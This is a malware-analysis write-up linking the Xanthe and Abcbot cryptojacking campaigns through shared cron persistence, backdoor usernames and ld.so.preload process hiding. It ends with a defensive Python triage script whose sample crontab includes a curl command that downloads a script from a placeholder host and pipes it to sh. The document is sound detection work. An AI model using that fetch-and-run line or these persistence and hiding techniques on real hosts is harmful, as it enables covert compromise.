There are a few infrastructure overlaps. For example, the following rule allowing ingress traffic from 64[.]225[.]46[.]44 in the Xanthe sample also appears in the Abcbot sample.
Whilst it’s common to see cryptojacking malware authors simply copy code from each other, there are a number of other similarities discussed below which make a direct link in ownership between the Xanthe and Abcbot campaigns more likely.
In the original report from Cisco’s Talos security research team, researchers commented on the coding style of the shell scripts being analysed – in particular, functions being declared at the top of the file and then invoked in some of the later lines.
Talos researchers suggested that this likely aids testing of new iterations, with functionality enabled/disabled through commenting of the lines responsible for function invocation.
Both the Abcbot and Xanthe samples we compared follow this coding style.
Linking these two samples based on code style similarities alone would be tenuous, at best. However, if we look at some of the function names themselves, correlation becomes apparent.
Several of the functions have “go” appended to the end of the function name and some functions have identical names. The following names appear in both samples:
nameservercheck
croncheckgo
checkrc
iptableschecker
filerungo
Comparing the two implementations, we can immediately see that the Abcbot version of the nameservercheck function is significantly larger than its Xanthe counterpart.
The Xanthe sample we analyzed is older than the Abcbot sample by over a year (according to VirusTotal submissions).
This could indicate that the Abcbot version of the function has been iterated on several times, with new functionality added at each iteration.
The croncheckgo function in both samples is responsible for achieving persistence via the cron scheduling utility common to most Linux distributions.
Both samples include the same TODO comment from the author, noting that logic still needs to be added to determine whether cron is running on different Linux distributions.
The service command is then used to start the cron daemon (named cron or crond depending on the distribution), ensuring that any modifications made to the crontab are honoured by the scheduler.
The cron entries consist of curl commands with specified user-agent strings.
The purpose of this is covered in Talos’ research, but if we look at the strings themselves, we can see that fczyo-cron is used in both samples, with a different version number appended in each. Incidentally, one of the payloads downloaded by Xanthe is also named “fczyo”.
Reuse of a unique string such as this does seem more than coincidental and suggests that the code running on servers from both the Xanthe and Abcbot campaigns expects this string to be present in the user-agent.
Talos researchers noted that Xanthe propagated by enumerating the SSH known_hosts file, allowing the malware to spread to machines that the compromised host had previously connected to.
Our research into Abcbot showed examples of code used to add four malicious users to the compromised host, effectively creating four backdoors for the actor to utilize. The malicious usernames in question were:
logger
sysall
system
autoupdater
In the Xanthe sample, users with the same usernames are added to the system (if they do not already exist).
Similarly, both Abcbot and Xanthe search for and remove users that we assumed were from competing campaigns.
As researchers at Talos reported, perhaps one of the defining features of Xanthe was the use of an open source process hiding library named libprocesshider.so. This was used to hide the process created by the XMRig miner by inserting the path to the library into the /etc/ld.so.preload file; the dynamic linker loads every library listed there into each dynamically linked process, so the library’s hooked readdir calls filter the miner out of /proc listings and therefore out of tools such as ps and top.
We did not see evidence of this process hiding technique in the Abcbot sample we analyzed. We did, however, see code that references the technique as used in previous campaigns (such as Xanthe) in the kill_miner_proc function, which is responsible for clearing artifacts of miners from competing or prior campaigns.
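A host-triage script built from the indicators discussed above (the fczyo-cron user-agent in cron entries, the four backdoor usernames, and the libprocesshider.so entry in /etc/ld.so.preload), as an added example that is not code from the original post or from either campaign. The sample crontab, passwd and preload contents are constructed; the user-agent version format, the URL and the library path are assumptions, since the text only establishes the shared “fczyo-cron” substring and the library name.

```python
import re
from typing import Dict, List

# Indicators drawn from the analysis above. The exact user-agent layout
# ("fczyo-cron" followed by a version number) is an assumption; the text only
# establishes that the substring "fczyo-cron" is shared by both samples.
SUSPECT_USERS = {"logger", "sysall", "system", "autoupdater"}
UA_RE = re.compile(r"fczyo-cron[^\s'\"]*")
PRELOAD_LIB = "libprocesshider.so"

# Constructed sample input (not captured from a real host). The URL, library
# path and version number are placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * curl -fsSL -A "fczyo-cron/1.2" http://example.invalid/a.sh | sh
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ubuntu:x:1000:1000::/home/ubuntu:/bin/bash
sysall:x:1001:1001::/home/sysall:/bin/bash
autoupdater:x:1002:1002::/home/autoupdater:/bin/bash
"""
SAMPLE_PRELOAD = "/usr/local/lib/libprocesshider.so\n"


def check_crontab(crontab_text: str) -> List[Dict[str, object]]:
    """Flag cron entries that fetch with curl and send the shared fczyo-cron UA."""
    hits = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue  # blank or commented-out entry
        ua = UA_RE.search(entry)
        if "curl" in entry and ua:
            hits.append({"line": lineno, "user_agent": ua.group(0), "entry": entry})
    return hits


def check_passwd(passwd_text: str) -> List[Dict[str, str]]:
    """Report accounts named like the four backdoor users added by both samples.

    "system" and "logger" can legitimately exist on some hosts, so the UID,
    home and shell are returned for the analyst rather than auto-judged.
    """
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue  # malformed or blank line
        name, _, uid, _, _, home, shell = fields[:7]
        if name in SUSPECT_USERS:
            found.append({"user": name, "uid": uid, "home": home, "shell": shell})
    return found


def check_preload(preload_text: str) -> List[str]:
    """Return /etc/ld.so.preload entries that reference the process-hiding library."""
    return [line.strip() for line in preload_text.splitlines()
            if PRELOAD_LIB in line and not line.strip().startswith("#")]


def triage(crontab_text: str, passwd_text: str, preload_text: str) -> Dict[str, object]:
    """Run all three checks and summarise whether any indicator fired."""
    cron = check_crontab(crontab_text)
    users = check_passwd(passwd_text)
    preload = check_preload(preload_text)
    return {
        "cron": cron,
        "users": users,
        "preload": preload,
        "suspicious": bool(cron or users or preload),
    }


if __name__ == "__main__":
    # On a live host, read /etc/crontab, /var/spool/cron/*, /etc/passwd and
    # /etc/ld.so.preload instead of the constructed samples.
    result = triage(SAMPLE_CRONTAB, SAMPLE_PASSWD, SAMPLE_PRELOAD)
    for key in ("cron", "users", "preload"):
        for item in result[key]:
            print(f"[{key}] {item}")
    print("suspicious:", result["suspicious"])
```

Because both campaigns only create the backdoor accounts if they do not already exist, the passwd check deliberately reports context (UID, home, shell) instead of a verdict: a pre-existing, legitimately provisioned “logger” account and one added by the malware look identical by name alone.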